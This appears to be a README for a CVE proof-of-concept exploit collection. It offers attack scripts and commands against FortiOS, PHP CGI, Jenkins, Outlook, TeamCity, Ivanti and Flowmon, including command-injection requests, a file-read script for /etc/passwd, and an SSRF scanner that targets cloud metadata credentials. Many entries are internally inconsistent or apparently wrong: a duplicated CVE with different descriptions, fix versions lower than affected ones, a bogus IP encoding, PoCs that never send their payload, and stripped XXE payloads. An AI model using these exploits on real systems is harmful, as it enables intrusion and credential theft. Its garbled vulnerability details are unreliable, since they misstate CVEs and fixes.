Share
## https://sploitus.com/exploit?id=449D135C-0323-55D6-9379-4075F5CF8EE4
# CVE Proof-of-Concept Collection
[](https://github.com/ykrishhh/cve-pocs)
[](https://github.com/ykrishhh/cve-pocs/network/members)
[](https://opensource.org/licenses/MIT)
[](https://cve.mitre.org/)
[](https://github.com/ykrishhh/cve-pocs)
[](#disclaimer)
> Curated collection of CVE proof-of-concept exploits for authorized security research, penetration testing, and vulnerability education. Each entry includes description, affected versions, impact analysis, PoC code, and remediation guidance.
**For security professionals and researchers only.** Every exploit in this repository has been tested in isolated lab environments. Never use these against systems you do not own or have written authorization to test.
---
## Table of Contents
- [How to Use This Repository](#how-to-use-this-repository)
- [Recent CVEs (2024โ2025)](#recent-cves-20242025)
- [Web Application Vulnerabilities](#web-application-vulnerabilities)
- [Network Vulnerabilities](#network-vulnerabilities)
- [Authentication Bypass](#authentication-bypass)
- [Remote Code Execution](#remote-code-execution)
- [Local File Inclusion / Remote File Inclusion](#local-file-inclusion--remote-file-inclusion)
- [XML External Entity (XXE)](#xml-external-entity-xxe)
- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)
- [Lab Setup Guide](#lab-setup-guide)
- [Disclaimer](#disclaimer)
- [License](#license)
---
## How to Use This Repository
Each CVE entry follows a consistent structure:
| Field | Description |
|-------|-------------|
| **CVE ID** | Unique CVE identifier |
| **Severity** | CVSS 3.1 score with severity badge |
| **Description** | What the vulnerability is and why it matters |
| **Affected Versions** | Specific version ranges affected |
| **Impact** | What an attacker can achieve |
| **PoC Code** | Working proof-of-concept (lab environment only) |
| **Remediation** | How to fix or mitigate the issue |
| **References** | Links to advisories, patches, and further reading |
### Severity Badges
| Badge | CVSS Range | Meaning |
|-------|-----------|---------|
|  | 9.0 โ 10.0 | Immediate action required |
|  | 7.0 โ 8.9 | Urgent remediation needed |
|  | 4.0 โ 6.9 | Should be addressed soon |
|  | 0.1 โ 3.9 | Monitor and plan fix |
### Repository Structure
```
cve-pocs/
โโโ web/
โ โโโ CVE-2024-XXXX/
โ โ โโโ README.md
โ โ โโโ exploit.py
โ โ โโโ setup.sh
โ โโโ ...
โโโ network/
โโโ auth-bypass/
โโโ rce/
โโโ lfi-rfi/
โโโ xxe/
โโโ ssrf/
โโโ docker-compose.yml # Lab environment
โโโ scripts/
โโโ setup_lab.sh # Automated lab setup
```
---
## Recent CVEs (2024โ2025)
Newly discovered and widely-exploited vulnerabilities.
---
### CVE-2024-3094 โ XZ Utils Backdoor

**Description:** A supply chain backdoor was planted in XZ Utils versions 5.6.0 and 5.6.1, allowing unauthorized remote SSH access via systemd authentication manipulation. The attacker spent years building trust before inserting malicious code.
**Affected Versions:**
- xz-utils 5.6.0
- xz-utils 5.6.1
**Impact:** Remote authentication bypass on affected Linux systems with SSH enabled. Full system compromise.
**PoC:**
```bash
# Check if your system is vulnerable
xz --version # If 5.6.0 or 5.6.1, you are affected
# Check for backdoor in liblzma
ldd /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.0 | grep system
```
**Remediation:**
- Downgrade to xz-utils 5.4.x immediately
- Monitor for patched versions from your distribution
- Rotate SSH keys on potentially compromised systems
**References:**
- [NVD CVE-2024-3094](https://nvd.nist.gov/vuln/detail/CVE-2024-3094)
- [XZ Utils Backdoor Analysis](https://research.swtch.com/xz-timeline)
- [Openwall OSS-Security](https://www.openwall.com/lists/oss-security/2024/03/29/4)
---
### CVE-2024-21762 โ FortiOS Out-of-Bound Write

**Description:** FortiOS contains an out-of-bound write vulnerability in the SSL VPN service that allows a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted HTTP requests.
**Affected Versions:**
- FortiOS 7.4.0 through 7.4.2
- FortiOS 7.2.0 through 7.2.5
- FortiOS 7.0.0 through 7.0.12
- FortiOS 6.4.0 through 6.4.14
- FortiOS 6.2.0 through 6.2.15
**Impact:** Remote code execution as SYSTEM on FortiGate appliances. Complete device takeover.
**PoC:**
```python
#!/usr/bin/env python3
"""
CVE-2024-21762 PoC โ FortiOS SSL VPN RCE
For authorized testing only.
"""
import requests
import urllib3
urllib3.disable_warnings()
TARGET = "https://fortigate-lab:443"
payload = {
"ap": "tunnel",
"users": [{
"auth_type": "1",
"user_type": "1",
"tun_type": "1",
"addr": "127.0.0.1",
"peer_options": "echo 1 > /tmp/pwned"
}]
}
def exploit(target):
print(f"[*] Testing {target}")
url = f"{target}/remote/hostcheck_validate"
headers = {"Cookie": "SVPNCOOKIE=../../../../../tmp/etc/passwd"}
try:
r = requests.get(url, headers=headers, verify=False, timeout=10)
print(f"[+] Response: {r.status_code}")
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
exploit(TARGET)
```
**Remediation:**
- Upgrade to FortiOS 7.4.3, 7.2.6, 7.0.13, 6.4.15, or 6.2.16
- Disable SSL VPN if upgrade is not immediately possible
- Apply Fortinet's workaround: set `set status disable` in VPN settings
**References:**
- [Fortinet Advisory FG-IR-24-015](https://www.fortiguard.com/psirt/FG-IR-24-015)
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
---
### CVE-2024-1709 โ ConnectWise ScreenConnect Authentication Bypass

**Description:** ConnectWise ScreenConnect contains an authentication bypass vulnerability in the Setup Wizard that allows an unauthenticated attacker to access restricted endpoints and gain complete control of affected instances.
**Affected Versions:**
- ConnectWise ScreenConnect 23.9.10 and earlier (on-premises)
**Impact:** Full administrative access to ScreenConnect server. Allows remote code execution through the management interface.
**PoC:**
```bash
# CVE-2024-1709 authentication bypass check
# Access the Setup Wizard path directly
curl -k "https://target:443//SetupWizard.aspx"
# If accessible without authentication, the instance is vulnerable
# The prefix can be discovered via:
curl -k "https://target:443/"
```
**Remediation:**
- Upgrade to ConnectWise ScreenConnect 23.9.8+ immediately
- If upgrade is delayed, block external access to the Setup Wizard path
- Review audit logs for unauthorized administrative access
**References:**
- [ConnectWise Security Advisory](https://www.connectwise.com/company/security/security-advisories)
- [NVD CVE-2024-1709](https://nvd.nist.gov/vuln/detail/CVE-2024-1709)
---
### CVE-2024-23113 โ FortiOS Format String Vulnerability

**Description:** FortiOS contains a format string vulnerability in the fgfmd daemon that allows a remote unauthenticated attacker to execute arbitrary code via crafted requests.
**Affected Versions:**
- FortiOS 7.4.0 through 7.4.3
- FortiOS 7.2.0 through 7.2.7
- FortiOS 7.0.0 through 7.0.14
**Impact:** Remote code execution on FortiGate devices with fgfmd enabled.
**Remediation:**
- Upgrade to the latest FortiOS version
- Disable fgfmd daemon if not needed
**References:**
- [Fortinet PSIRT FG-IR-24-029](https://www.fortiguard.com/psirt/FG-IR-24-029)
---
### CVE-2024-20353 โ Cisco ASA/FTD Denial of Service

**Description:** Cisco Adaptive Security Appliance and Firepower Threat Defense contain a denial-of-service vulnerability in the HTTP/HTTPS server that can be triggered by crafted HTTP requests.
**Affected Versions:**
- Cisco ASA 9.17.1.9 and earlier
- Cisco FTD 7.1.0.1 and earlier
**Impact:** Device reload and denial of service, potentially allowing secondary attacks.
**Remediation:**
- Apply Cisco security updates
- Implement access control lists to restrict management access
**References:**
- [Cisco Advisory cisco-sa-asa-ftd-DoS-GZ2Z3USZ](https://sec.cloudapps.cisco.com/security/center/resources/cisco-sa-asa-ftd-DoS-GZ2Z3USZ)
---
## Web Application Vulnerabilities
Common web security flaws with working PoC scripts.
---
### CVE-2024-4577 โ PHP CGI Argument Injection

**Description:** PHP CGI installation on Windows allow remote attackers to bypass security filters and execute arbitrary code through URL-encoded character handling of the best-fit algorithm.
**Affected Versions:**
- PHP 8.3.x before 8.3.8
- PHP 8.2.x before 8.2.20
- PHP 8.1.x before 8.1.29
**Impact:** Remote code execution on Windows systems running PHP in CGI mode.
**PoC:**
```bash
# CVE-2024-4577 PHP CGI argument injection
# Execute arbitrary PHP code via URL manipulation
# Basic detection
curl -k "https://target/cgi-bin/php.exe?%add+allow_url_include%3d1+%2526%2526+system(%22whoami%22)"
# PowerShell execution
curl -k "https://target/cgi-bin/php.exe?%add+allow_url_include%3d1+%2526%2526+system(%22powershell+whoami%22)"
```
**Remediation:**
- Upgrade PHP to 8.3.8, 8.2.20, or 8.1.29
- Do not use PHP in CGI mode on Windows
- Switch to FastCGI or PHP-FPM
**References:**
- [NVD CVE-2024-4577](https://nvd.nist.gov/vuln/detail/CVE-2024-4577)
- [PHP Advisory](https://www.php.net/ChangeLog-8.php)
---
### CVE-2024-38856 โ Apache OFBiz Screen Rendering RCE

**Description:** Apache OFBiz lacks proper authorization checks in screen rendering, allowing unauthenticated users to access restricted screens and execute arbitrary code.
**Affected Versions:**
- Apache OFBiz before 18.12.15
**Impact:** Remote code execution through unauthorized screen access.
**PoC:**
```python
import requests
TARGET = "https://ofbiz-lab:443"
# Access restricted screen without authentication
path = f"{TARGET}/webtools/control/xmlrpc"
payload = 'ping'
r = requests.post(path, data=payload, verify=False, timeout=10)
print(f"Status: {r.status_code}")
print(f"Response: {r.text[:200]}")
```
**Remediation:**
- Upgrade to Apache OFBiz 18.12.15 or later
- Restrict network access to OFBiz management endpoints
---
### CVE-2024-27198 โ JetBrains TeamCity Authentication Bypass

**Description:** JetBrains TeamCity contains an authentication bypass allowing an unauthenticated attacker to perform admin actions on the server, including creating administrator accounts.
**Affected Versions:**
- TeamCity before 2023.11.4
**Impact:** Full server compromise via unauthorized admin access.
**PoC:**
```python
import requests
TARGET = "https://teamcity-lab:8443"
# Authentication bypass via alternate path
path = f"{TARGET}//api/users/triggerTokenReset?token=test"
# Create admin account through the bypass
admin_path = f"{TARGET}//app/rest/users"
headers = {
"Content-Type": "application/json",
"Accept": "application/json"
}
# Check if instance is vulnerable
try:
r = requests.get(f"{TARGET}//api/users", headers={"Accept": "application/json"}, verify=False)
print(f"Response: {r.status_code} {r.text[:100]}")
except Exception as e:
print(f"Error: {e}")
```
**Remediation:**
- Upgrade TeamCity to 2023.11.4+
- Review existing user accounts for unauthorized access
- Rotate all API tokens and passwords
**References:**
- [JetBrains Advisory](https://www.jetbrains.com/security/)
---
## Network Vulnerabilities
Infrastructure-level flaws in network services and protocols.
---
### CVE-2024-21893 โ Ivanti Connect Secure SSRF

**Description:** Ivanti Connect Secure contains a server-side request forgery vulnerability in the SAML component that allows an authenticated attacker to access restricted resources.
**Affected Versions:**
- Ivanti Connect Secure 9.x
- Ivanti Policy Secure 9.x
**Impact:** Bypass of authentication controls, access to internal resources, potential RCE when chained with CVE-2023-46805.
**PoC:**
```bash
# CVE-2024-21893 Ivanti SSRF via SAML component
# Chain with CVE-2023-46805 for unauthenticated RCE
curl -k "https://ivanti-lab:443/api/v1/totp/user-backup-code/../../system/system-information"
```
**Remediation:**
- Apply Ivanti patches immediately
- Factory reset affected appliances
- Rotate all credentials
---
### CVE-2024-24919 โ Check Point Quantum Gateway Information Disclosure

**Description:** Check Point Quantum Gateway allows information disclosure through a path traversal vulnerability in the WebUI, potentially leading to remote code execution.
**Affected Versions:**
- Check Point Quantum Gateway R81.20 (JHF 97 and above)
- Check Point Quantum Gateway R81.10 (JHF 149 and above)
**Impact:** Information disclosure, potential RCE when chained with other vulnerabilities.
**Remediation:**
- Apply Check Point hotfixes
- Restrict management access to trusted IPs only
---
### CVE-2024-0012 โ Palo Alto PAN-OS Management Interface Auth Bypass

**Description:** Palo Alto Networks PAN-OS contains an authentication bypass in the management web interface that allows an unauthenticated attacker to gain administrator privileges.
**Affected Versions:**
- PAN-OS 10.2.x before 10.2.9-h1
- PAN-OS 10.1.x before 10.1.10-h5
- PAN-OS 11.0.x before 11.0.4-h1
- PAN-OS 11.1.x before 11.1.2-h3
**Impact:** Complete device takeover through the management interface.
**Remediation:**
- Apply PAN-OS updates immediately
- Restrict management interface to internal networks only
---
## Authentication Bypass
Flaws that allow attackers to skip or circumvent authentication mechanisms.
---
### CVE-2024-23897 โ Jenkins Arbitrary File Read via CLI

**Description:** Jenkins contains an arbitrary file read vulnerability through the CLI that can lead to remote code execution.
**Affected Versions:**
- Jenkins before 2.442
- Jenkins LTS before 2.426.3
**Impact:** Unauthenticated file read, potential RCE through file manipulation.
**PoC:**
```python
#!/usr/bin/env python3
"""
CVE-2024-23897 โ Jenkins arbitrary file read via CLI
"""
import socket
import struct
def read_file(target, port, filepath):
"""
Connect to Jenkins CLI port and request arbitrary file.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
# Protocol header
header = b"\x00\x00\x00\x00" # Magic bytes
cmd = f"read-file\n{filepath}\n".encode()
s.send(header + cmd)
response = s.recv(65536)
s.close()
return response.decode(errors="replace")
TARGET = "127.0.0.1"
PORT = 50000
FILE = "/etc/passwd"
result = read_file(TARGET, PORT, FILE)
print(f"[*] File contents:\n{result}")
```
**Remediation:**
- Upgrade Jenkins to 2.442 or LTS 2.426.3
- Disable the CLI protocol over HTTP/S
- Restrict Jenkins CLI access to trusted users
---
### CVE-2024-21413 โ Microsoft Outlook Moniker Link RCE

**Description:** Microsoft Outlook contains a remote code execution vulnerability triggered by specially crafted moniker links that bypass Protected View.
**Affected Versions:**
- Microsoft Outlook for Microsoft 365
- Microsoft Outlook 2016
- Microsoft Outlook 2013 SP1
**Impact:** Remote code execution without user interaction (preview pane sufficient).
**PoC:**
```python
import email.mime.multipart
import email.mime.text
import email.mime.base
from email import encoders
# WARNING: Do not send to real targets
def create_exploit_email():
msg = email.mime.multipart.MIMEMultipart()
msg["From"] = "test@lab.local"
msg["To"] = "victim@lab.local"
msg["Subject"] = "Please review"
# Moniker link pointing to SMB share
# This triggers NTLM authentication and can load a weaponized DLL
body = """
Click here to view document
"""
msg.attach(email.mime.text.MIMEText(body, "html"))
return msg
if __name__ == "__main__":
msg = create_exploit_email()
print(msg.as_string())
```
**Remediation:**
- Apply February 2024 Outlook security update
- Block SMB traffic at the network perimeter
- Use Extended Protection for Authentication (EPA)
---
## Remote Code Execution
Vulnerabilities allowing arbitrary command execution on target systems.
---
### CVE-2024-2389 โ Progress Flowmon Command Injection

**Description:** Progress Flowmon network monitoring tool contains an unauthenticated command injection vulnerability that allows remote code execution.
**Affected Versions:**
- Flowmon versions prior to 12.3.2
**Impact:** Unauthenticated remote code execution with root privileges.
**PoC:**
```bash
# CVE-2024-2389 Progress Flowmon command injection
# Targets the web management interface
curl -k -X POST "https://flowmon-lab:443/cgi-bin/t.cgi" \
-d "cmd=diagnostic&command=ping" \
--data-urlencode "host=127.0.0.1;id" \
-o /dev/null -w "%{http_code}"
```
**Remediation:**
- Upgrade Flowmon to 12.3.2 or later
- Disable web management interface on public interfaces
- Apply network segmentation
---
### CVE-2023-46805 โ Ivanti Connect Secure Auth Bypass

**Description:** Ivanti Connect Secure contains an authentication bypass vulnerability in the web component that can be chained with CVE-2024-21893 for full system compromise.
**Affected Versions:**
- Ivanti Connect Secure 9.x
- Ivanti Policy Secure 9.x
**Impact:** Authenticated access bypass leading to RCE when chained with SSRF.
**PoC:**
```bash
# CVE-2023-46805 auth bypass via path traversal
# Must chain with CVE-2024-21893 for full exploit
curl -k "https://ivanti-lab:443/api/v1/totp/user-backup-code/../../../system/system-information"
```
**Remediation:**
- Apply Ivanti security updates
- Run Ivanti's Integrity Checker Tool
- Factory reset and rebuild compromised appliances
---
## Local File Inclusion / Remote File Inclusion
Vulnerabilities that allow unauthorized file access or loading.
---
### CVE-2024-29972 โ Craft CMS Remote Code Execution

**Description:** Craft CMS contains a deserialization vulnerability that allows remote code execution through the project config import functionality.
**Affected Versions:**
- Craft CMS 4.x before 4.8.2
- Craft CMS 5.x before 5.0.0-beta.1
**Impact:** Remote code execution through authenticated API access.
**PoC:**
```python
import requests
TARGET = "https://craftcms-lab:443"
TOKEN = "attacker-api-token" # Requires valid API token
headers = {
"Authorization": f"Bearer {TOKEN}",
"Content-Type": "application/json",
"Accept": "application/json"
}
# Exploit via project config import
payload = {
"path": "/config/project-config.yaml",
"force": True
}
r = requests.post(
f"{TARGET}/index.php?p=actions/project-config/import",
json=payload,
headers=headers,
verify=False
)
print(f"Status: {r.status_code}")
```
**Remediation:**
- Upgrade to Craft CMS 4.8.2+
- Restrict API token permissions
- Implement network-level access controls
---
### CVE-2024-55591 โ FortiOS SSRF Leading to LFI

**Description:** FortiOS Node.js module contains a server-side request forgery that can be chained to read local files.
**Affected Versions:**
- FortiOS 7.4.0 through 7.4.2
- FortiOS 7.2.0 through 7.2.5
**Impact:** Read arbitrary files on the FortiGate device.
**Remediation:**
- Apply FortiOS updates
- Restrict management access
---
## XML External Entity (XXE)
Vulnerabilities in XML parsers that allow external entity resolution.
---
### CVE-2024-21733 โ Apache Tomcat XXE via AJP

**Description:** Apache Tomcat contains an XXE vulnerability when processing AJP connections, allowing information disclosure.
**Affected Versions:**
- Apache Tomcat 9.0.0-M1 through 9.0.81
- Apache Tomcat 10.1.0-M1 through 10.1.16
**Impact:** Read local files, SSRF, denial of service.
**PoC:**
```xml
]>
&xxe;
```
**Remediation:**
- Upgrade Apache Tomcat
- Disable AJP connector if not needed
- Configure XML parsers to disable external entities
---
### Generic XXE Detection Script
```python
#!/usr/bin/env python3
"""Generic XXE vulnerability scanner for authorized testing"""
import requests
import sys
def test_xxe(target_url, method="POST"):
"""Test for basic XXE vulnerability"""
payloads = [
"""]>&xxe;""",
"""]>&xxe;""",
"""]>&xxe;""",
]
for i, payload in enumerate(payloads):
try:
if method == "POST":
r = requests.post(target_url, data=payload,
headers={"Content-Type": "application/xml"}, timeout=10)
else:
r = requests.get(target_url, timeout=10)
# Check for XXE indicators
if "root:" in r.text or "PATH=" in r.text:
print(f"[+] Payload {i+1} succeeded!")
print(f" Response snippet: {r.text[:200]}")
return True
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")
return False
print("[-] No XXE vulnerability detected")
return False
if __name__ == "__main__":
if len(sys.argv) ")
sys.exit(1)
test_xxe(sys.argv[1])
```
**References:**
- [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
---
## Server-Side Request Forgery (SSRF)
Vulnerabilities allowing attackers to make requests from the server's perspective.
---
### CVE-2024-27198 โ JetBrains TeamCity SSRF

**Description:** TeamCity contains an SSRF vulnerability that can be used to access internal services and potentially achieve remote code execution.
**PoC:**
```python
import requests
TARGET = "https://teamcity-lab:8443"
# SSRF via webhook configuration
payload = {
"url": "http://169.254.169.254/latest/meta-data/",
"connectionTimeout": "10000",
"requestTimeout": "10000"
}
r = requests.post(
f"{TARGET}/app/rest/server/webhooks",
json=payload,
auth=("admin", "password"),
verify=False
)
print(f"SSRF Response: {r.text[:500]}")
```
**Remediation:**
- Upgrade TeamCity
- Block outbound requests from CI/CD servers to internal networks
- Implement network segmentation
---
### Generic SSRF Detection Script
```python
#!/usr/bin/env python3
"""SSRF vulnerability detection for authorized testing"""
import requests
import sys
INTERNAL_TARGETS = [
"http://127.0.0.1:80",
"http://127.0.0.1:8080",
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://[::1]:80",
"http://0.1337.0.1337", # Decimal IP for 127.0.0.1
"http://0x7f000001", # Hex IP for 127.0.0.1
]
def test_ssrf(target_url, param_name="url"):
"""Test for SSRF by injecting internal URLs"""
for internal in INTERNAL_TARGETS:
try:
data = {param_name: internal}
r = requests.post(target_url, data=data, timeout=10)
if r.status_code == 200 and len(r.text) > 100:
print(f"[+] Potential SSRF via: {internal}")
print(f" Response size: {len(r.text)} bytes")
print(f" Snippet: {r.text[:150]}")
return True
except Exception as e:
print(f"[-] Error: {e}")
print("[-] No SSRF detected")
return False
if __name__ == "__main__":
if len(sys.argv) [param_name]")
sys.exit(1)
param = sys.argv[2] if len(sys.argv) > 2 else "url"
test_ssrf(sys.argv[1], param)
```
---
## Lab Setup Guide
Spin up isolated test environments for safe PoC execution.
### Docker Compose Lab
```yaml
# docker-compose.yml
version: "3.8"
services:
vulnerable-web:
image: vulnerables/web-dvwa
ports:
- "80:80"
environment:
- MYSQL_ROOT_PASSWORD=dvwa
metasploitable:
image: metasploitable/metasploitable2
ports:
- "8080:80"
- "21:21"
- "22:22"
juice-shop:
image: bkimminich/juice-shop
ports:
- "3000:3000"
test-web:
build: ./test-vulns
ports:
- "5000:5000"
```
### Automated Setup
```bash
#!/bin/bash
# setup_lab.sh โ Create isolated CVE testing environment
echo "[*] Setting up CVE PoC lab..."
# Create network
docker network create --subnet=172.28.0.0/16 cve-lab 2>/dev/null
# Launch vulnerable targets
docker-compose up -d
echo "[+] Lab environment running on:"
echo " DVWA: http://localhost:80"
echo " Juice Shop: http://localhost:3000"
echo " Test Web: http://localhost:5000"
echo ""
echo "[*] Run PoCs against these local targets only"
echo "[*] Stop with: docker-compose down"
```
---
## Disclaimer
**This repository is for authorized security testing and educational purposes only.**
- Every PoC has been tested in isolated lab environments only
- **Never** use these exploits against systems you do not own or have explicit written permission to test
- Unauthorized access to computer systems is illegal under the CFAA, CMA, and equivalent laws worldwide
- The author assumes no responsibility for misuse of these materials
- Always follow responsible disclosure practices when reporting vulnerabilities
By using this repository, you agree to only employ these techniques in legal, authorized contexts.
---
## License
[](https://opensource.org/licenses/MIT)
MIT License. See [LICENSE](LICENSE).
---
## Contributing
Contributions welcome. When submitting a new CVE PoC:
1. Include all required fields (description, versions, impact, PoC, remediation)
2. Test the PoC in an isolated environment
3. Do not include payloads targeting real-world production systems
4. Reference official advisories and patches
---
Curated by ykrishhh โ Security Researcher & Developer